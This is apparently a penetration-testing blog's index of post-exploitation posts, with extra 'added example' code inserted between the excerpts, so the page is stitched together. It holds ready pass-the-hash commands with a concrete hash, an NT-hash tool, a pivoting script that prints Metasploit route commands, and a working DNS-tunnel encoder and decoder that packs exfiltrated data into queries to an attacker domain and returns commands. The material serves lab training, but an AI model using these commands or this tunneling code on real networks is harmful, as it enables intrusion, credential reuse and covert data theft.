Introduction to Post Exploitation

Post-exploitation is the phase that follows a successful compromise of a system, whether by an attacker or a penetration tester. Where initial exploitation focuses on gaining entry, post-exploitation is about leveraging that access to achieve specific objectives: it covers all the operations performed after initial access, with the aim of extending control over the target system and the surrounding network. Detailed intro coming soon ...

November 24, 2025 · 1 min · 72 words · 0x-s0M3n4th

Gaining a Shell Using pth-winexe, Impacket & xfreerdp

pth-winexe:

    pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 //192.168.83.136 cmd

Impacket psexec:

    impacket-psexec Administrator@192.168.83.136 -hashes aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5

xfreerdp:

    xfreerdp3 /u:Administrator /pth:58f5081696f366cdc72491a2c4996bd5 /v:192.168.83.136

This gives GUI access to the target. The value passed to pth-winexe and impacket-psexec is the LM:NT pair: aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password (what you see when LM hashing is disabled), and the NT hash is always 32 hex characters. xfreerdp's /pth: takes only the NT hash, and it only works when the target has Restricted Admin mode enabled for RDP; otherwise the logon is refused and you need the cleartext password.
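As an added example (not code from the original post), the following Python shows where the NT half of that LM:NT pair comes from and checks a pair before it is handed to any of the three tools above. The NT hash is MD4 over the UTF-16LE encoding of the password; a pure-Python MD4 is included because OpenSSL 3 builds of hashlib often lack the legacy md4 algorithm. The hashes used in the checks are the page's own; the function names and the "password" test value are this example's assumptions.

```python
import struct

# LM hash of the empty password: what appears in the LM slot when LM hashing is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is unavailable on many OpenSSL 3 builds."""
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                      # Merkle-Damgard padding, same scheme as MD5
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)     # little-endian 64-bit bit length

    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    round2_k = [(i % 4) * 4 + i // 4 for i in range(16)]        # 0,4,8,12,1,5,9,13,...
    round3_k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):               # round 1
            a = _rotl((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):               # round 2
            a = _rotl((a + G(b, c, d) + X[round2_k[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):               # round 3
            a = _rotl((a + H(b, c, d) + X[round3_k[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK32, (B + b) & MASK32, (C + c) & MASK32, (D + d) & MASK32
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex, as used by pth-winexe/impacket/xfreerdp."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pth(hashes: str):
    """Validate an LM:NT string; returns (lm, nt, lm_is_empty) or raises ValueError."""
    lm, sep, nt = hashes.partition(":")
    if not sep:
        raise ValueError("expected LM:NT")
    for name, h in (("LM", lm), ("NT", nt)):
        if len(h) != 32 or any(ch not in "0123456789abcdefABCDEF" for ch in h):
            raise ValueError(f"{name} hash must be 32 hex characters, got {len(h)}")
    return lm.lower(), nt.lower(), lm.lower() == EMPTY_LM


def is_valid_pth(hashes: str) -> bool:
    try:
        parse_pth(hashes)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The pair from the commands above is well formed; a hash with a digit dropped is not.
    print(parse_pth("aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5"))
    print(is_valid_pth("aad3b435b51404eeaad3b435b51404ee:8f5081696f366cdc72491a2c4996bd5"))
    print(nt_hash("password"))  # assumed password, to show the hash the tools expect
```

Run the check on any dumped hash before spending time debugging an authentication failure: a pair that is not exactly 32:32 hex characters was mis-copied, not rejected by the target.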

November 24, 2025 · 1 min · 24 words · 0x-s0M3n4th

Post Exploitation Using Meterpreter

First get a reverse shell from the target machine. In my case the target is Blue and the attacker is Kali; I have also added Blue to vmnet2, aka the PIVOT-NET network. Let's use the EternalBlue (MS17-010) exploit to get a reverse shell. Establishing an interactive Meterpreter session between the compromised system and your attacker machine lets you collect sensitive and confidential information from the target system. The following is a brief list of useful commands within Meterpreter: ...

November 24, 2025 · 6 min · 1070 words · 0x-s0M3n4th

Lateral Movement and Pivoting

Lateral movement allows the penetration tester to move further into the targeted network, discovering additional assets and exploiting security vulnerabilities on remote systems with the intent of stealing confidential data and expanding the foothold. Within many organizations the network is segmented with routers and firewalls to stop cyber-attacks and threats from propagating through the organization. However, some hosts are configured with a dual-homed network connection, which simply means the host is connected to two different IP networks at the same time; such a host is a bridge between segments.

Our first target is the Blue VM. Fire up the Blue VM and the Kali machine, then exploit Blue and get a shell using the MS17-010 exploit. In the Meterpreter session, use the arp command to view the entries in the Address Resolution Protocol (ARP) cache of the compromised target. The ARP cache holds the IP-to-MAC address bindings of the hosts that recently exchanged traffic with the compromised host:

    meterpreter> arp

We can see that the target machine sits on two networks: the NAT network, aka PENTEST-NET (192.168.83.0/24), and 172.30.1.0/24 (PIVOT-NET). Next, use the ipconfig command within Meterpreter to view the list of network adapters and their IP addresses ...
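As an added example (not code from the original post), the Python below does by hand what you do by eye when reading arp and ipconfig on a dual-homed host: it works out which of the host's subnets the attacker cannot reach, lists the live hosts the ARP cache shows on those subnets, and prints the msfconsole route add lines needed to pivot into them. The interface and ARP data is constructed in a simplified "IP MAC" layout rather than copied from Meterpreter; 192.168.83.136 and the two subnets are the page's, while the 172.30.1.x addresses, MAC addresses, Kali's address and the session id are assumptions.

```python
import ipaddress

# Constructed sample data (not real Meterpreter output). 192.168.83.136 is the Blue VM
# from the page; the 172.30.1.x addresses and all MACs are assumptions for this example.
INTERFACES = [
    ("192.168.83.136", "255.255.255.0"),  # PENTEST-NET (NAT), where Kali also sits
    ("172.30.1.20", "255.255.255.0"),     # PIVOT-NET, not routed from Kali
]
ARP_CACHE = """\
192.168.83.2    00:50:56:f9:4e:3b
192.168.83.130  00:0c:29:aa:bb:cc
172.30.1.1      00:50:56:c0:00:02
172.30.1.15     00:0c:29:11:22:33
172.30.1.20     00:0c:29:dd:ee:ff
224.0.0.22      01:00:5e:00:00:16
"""


def host_networks(interfaces):
    """Subnets the compromised host is directly attached to, from its IP/netmask pairs."""
    return [ipaddress.ip_network(f"{ip}/{mask}", strict=False) for ip, mask in interfaces]


def parse_arp(text):
    """Yield (ip, mac) from 'IP MAC' lines, dropping multicast and broadcast entries."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        ip = ipaddress.ip_address(parts[0])
        if ip.is_multicast or parts[1].lower() == "ff:ff:ff:ff:ff:ff":
            continue
        yield ip, parts[1].lower()


def hidden_networks(interfaces, attacker_ip):
    """Subnets the host can reach but the attacker's own address is not on."""
    attacker = ipaddress.ip_address(attacker_ip)
    return [net for net in host_networks(interfaces) if attacker not in net]


def pivot_targets(interfaces, arp_text, attacker_ip):
    """Map each hidden subnet to the live hosts the ARP cache shows on it (the host itself excluded)."""
    own = {ipaddress.ip_address(ip) for ip, _ in interfaces}
    result = {str(net): [] for net in hidden_networks(interfaces, attacker_ip)}
    for ip, _mac in parse_arp(arp_text):
        for net in hidden_networks(interfaces, attacker_ip):
            if ip in net and ip not in own:
                result[str(net)].append(str(ip))
    return {net: sorted(hosts, key=ipaddress.ip_address) for net, hosts in result.items()}


def route_commands(interfaces, attacker_ip, session_id):
    """msfconsole 'route add <subnet> <netmask> <session>' lines for every hidden subnet."""
    return [f"route add {net.network_address} {net.netmask} {session_id}"
            for net in hidden_networks(interfaces, attacker_ip)]


if __name__ == "__main__":
    kali = "192.168.83.130"   # assumed attacker address on PENTEST-NET
    print(pivot_targets(INTERFACES, ARP_CACHE, kali))
    for cmd in route_commands(INTERFACES, kali, 1):   # session 1 assumed
        print(cmd)
```

The ARP cache only shows hosts that have talked to the compromised machine recently, so treat the list as a starting point for a scan through the pivot, not as a complete inventory of the hidden subnet.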

November 24, 2025 · 8 min · 1568 words · 0x-s0M3n4th

MITM Attacks

When connected to a network, whether wired or wireless, a large number of packets are sent back and forth between hosts. Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes and documents, which are valuable to a penetration tester. While many network protocols provide data encryption, many insecure protocols still transmit data in plaintext. ...

November 24, 2025 · 6 min · 1146 words · 0x-s0M3n4th

DNS Tunneling

How does DNS tunneling work? It is a step-by-step process that relies on DNS being allowed out of almost every network, so that other traffic can ride inside it with little scrutiny. Here is how it works, step by step:

1. The attacker registers a domain. The domain, like badsite.com, is controlled by the attacker, and its authoritative name server is a machine they own.
2. The attacker infects a computer. They use malware to gain control of a computer inside the target network. That computer becomes the client end of the DNS tunnel.
3. The client sends a DNS query. The infected computer encodes data in DNS queries, for example by putting a secret value in the subdomain part of the queried name.
4. The query reaches the DNS resolver. The resolver forwards the request towards the servers authoritative for the domain, as it would for any other name.
5. The attacker's server decodes the request. The attacker's server receives the DNS request, decodes the embedded data and can send back commands or other data in DNS responses.
6. The server encodes a response. The attacker's server encodes its own data as a DNS response, for instance an instruction for the infected computer to carry out.
7. The client receives and decodes the response. The infected computer receives the DNS response via the resolver, decodes the data and acts on it.
8. The process repeats as needed. If the data is too large for a single DNS message, the client and server split it into smaller parts, each sent in its own DNS query or response.

Attackers often use tools such as iodine, dnscat2 and Cobalt Strike to perform DNS tunneling; these handle the encoding and decoding of data within DNS packets. ...
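As an added example (not code from the original post and not the wire format of iodine, dnscat2 or Cobalt Strike), the Python below implements both ends of steps 3 to 8 offline: the client encodes a payload into query names under badsite.com, splitting it across several queries when it does not fit, and the server parses the names and reassembles the payload, tolerating the out-of-order and duplicated queries that real resolvers produce through retries and caching. The name layout <seq><total>.<base32 data>.<session>.<domain>, the 90-byte chunk size and the base64 TXT response are this example's own choices.

```python
import base64

DOMAIN = "badsite.com"   # attacker-controlled domain from the text
CHUNK = 90               # payload bytes per query: base32 gives 144 chars, i.e. three labels of <= 63
MAX_LABEL, MAX_NAME = 63, 253   # DNS limits: label length and total name length


def _b32(data: bytes) -> str:
    """base32 is hostname-safe (a-z, 2-7); '=' padding is not, so it is stripped."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(payload: bytes, session: str = "a1", domain: str = DOMAIN):
    """Client side: turn payload into query names <seq><total>.<data labels>.<session>.<domain>."""
    chunks = [payload[i:i + CHUNK] for i in range(0, len(payload), CHUNK)] or [b""]
    names = []
    for seq, chunk in enumerate(chunks):
        enc = _b32(chunk)
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        header = f"{seq:04x}{len(chunks):04x}"   # 4 hex digits sequence, 4 hex digits total
        name = ".".join([header, *labels, session, domain])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def parse_query(name: str, domain: str = DOMAIN):
    """Server side: (session, seq, total, data) from one query name, or None if it is not ours."""
    name = name.rstrip(".").lower()
    suffix = "." + domain
    if not name.endswith(suffix):
        return None
    labels = name[:-len(suffix)].split(".")
    if len(labels) < 2 or len(labels[0]) != 8:
        return None
    header, session, data = labels[0], labels[-1], "".join(labels[1:-1])
    try:   # untrusted input: anything that does not parse is simply ignored
        return session, int(header[:4], 16), int(header[4:], 16), _unb32(data)
    except ValueError:
        return None


def decode_queries(names, domain: str = DOMAIN):
    """Reassemble payloads per session; out-of-order and duplicate queries are harmless."""
    sessions = {}
    for name in names:
        parsed = parse_query(name, domain)
        if parsed is None:
            continue
        session, seq, total, data = parsed
        sessions.setdefault(session, (total, {}))[1][seq] = data
    complete = {}
    for session, (total, parts) in sessions.items():
        if len(parts) == total:
            complete[session] = b"".join(parts[i] for i in range(total))
    return complete


def encode_response(command: bytes) -> str:
    """Server side: a command sent back as TXT record data (base64 keeps it printable)."""
    return base64.b64encode(command).decode()


def decode_response(txt: str) -> bytes:
    return base64.b64decode(txt)


if __name__ == "__main__":
    exfil = b"user=administrator;host=blue;" + bytes(range(256))   # constructed payload
    queries = encode_queries(exfil)
    for q in queries:
        print(q)
    print(decode_queries(queries[::-1] + queries[:1]) == {"a1": exfil})
    print(decode_response(encode_response(b"whoami")))
```

The query names this produces are exactly what a defender sees in resolver logs: long, high-entropy labels and many unique subdomains under one domain, which is why DNS tunnel detection keys on name length, label entropy and query volume per domain rather than on packet contents.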

November 24, 2025 · 3 min · 451 words · 0x-s0M3n4th

BGP Hijacking

COMING SOON

November 24, 2025 · 1 min · 2 words · 0x-s0M3n4th